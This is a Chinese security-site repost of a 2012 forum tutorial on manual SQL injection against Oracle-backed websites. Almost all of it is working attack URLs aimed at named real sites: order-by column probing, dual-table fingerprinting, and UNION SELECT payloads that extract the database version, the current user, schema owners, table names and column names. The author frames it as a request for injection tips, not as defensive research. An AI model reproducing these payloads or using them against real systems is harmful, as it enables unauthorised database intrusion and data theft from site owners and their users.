刀城技术网-信息安全,服务器安全维护,网站安全维护

当前位置: 网站主页 > 数据安全 > Oracle注入 >

一个简单的oracle注入例子

时间:2012-06-06 11:01来源:http://bbs.blackbap.org/ 作者:huang 点击:
作者:huang 原文地址: http://bbs.blackbap.org/forum.php?mod=viewthreadtid=2093highlight=Oracle http://www.jjrw.com/info/news.jsp?id=7788 order by 13 正常 order by 14 错误 加上 返回正常 ;错误说明很有可能是 oracle 数据库、、、 %20and%20exi
作者:huang
原文地址:
http://bbs.blackbap.org/forum.php?mod=viewthread&tid=2093&highlight=Oracle


 

http://www.jjrw.com/info/news.jsp?id=7788

order by 13 正常

order by 14 错误

加上返回正常
;错误说明很有可能是oracle数据库、、、

%20and%20exists%20(select%20*%20from%20dual)返回正常说明是oracle

因为dualoracle的系统表

通过(selectbanner from sys.v_$version where rownum=1)获取版本信息、

 And exists (select * from dual)
返回正常说明是oracle

因为dualoracle的系统表

通过(selectbanner from sys.v_$version where rownum=1)获取版本信息

http://www.jjrw.com/info/news.jsp?id=7788%20order%20by%2013

 http://www.jjrw.com/info/news.jsp?id=7788%20and%201=2%20union%20select%201,2,null,null,null,null,null,null,null,null,11,null,null%20from%20dual--

(说明在3456789101213是字符型)

(select banner from sys.v_$version whererownum=1) 获取版本信息

http://www.jjrw.com/info/news.jsp?id=7788%20and%201=2%20union%20select%201,2,(select%20banner%20from%20sys.v_$version%20where%20rownum=1),null,null,'null',null,null,null,null,11,null,null%20from%20dual

(爆版本)

(select sys_context('userenv','current_user') from dual)获取当前数据库连接用户名

http://www.jjrw.com/info/news.jsp?id=7788%20and%201=2%20union%20select%201,2,(select%20sys_context%20('userenv','current_user')%20from%20dual),null,null,'null',null,null,null,null,11,null,null%20from%20dual

(select owner from all_tables whererownum=1)获取库名

http://www.jjrw.com/info/news.jsp?id=7788%20and%201=2%20union%20select%201,2,(select%20owner%20from%20all_tables%20where%20rownum=1),null,null,'null',null,null,null,null,11,null,null%20from%20dual
(得到第一个数据库名)

(select owner from all_tables where rownum=1and owner<>’第一个库名’)

(select table_name from user_tables whererowner=1)

http://www.jjrw.com/info/news.jsp?id=7788%20and%201=2%20union%20select%201,2,(select%20table_name%20from%20user_tables%20where%20rownum=1),null,null,'null',null,null,null,null,11,null,null%20from%20dual
(得到第一个表名)

(select table_name from user_tables whererowner=1 and table_name<>’第一次表名’)记得大小写要一致

(select column_name from user_tab_columnswhere table_name=’表名’ and rownum=1)爆列名、

http://www.enfodesk.com/minisite/mainad/index_info.php?menu=info_detail&info_id=84859%20and%20exists%20(select%20*%20from%20dual)

各位老大原谅我吧、、我发出来、、是为了让大家指点下oracle方面的注入。




(责任编辑:刀)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
验证码:点击我更换图片
栏目列表
推荐内容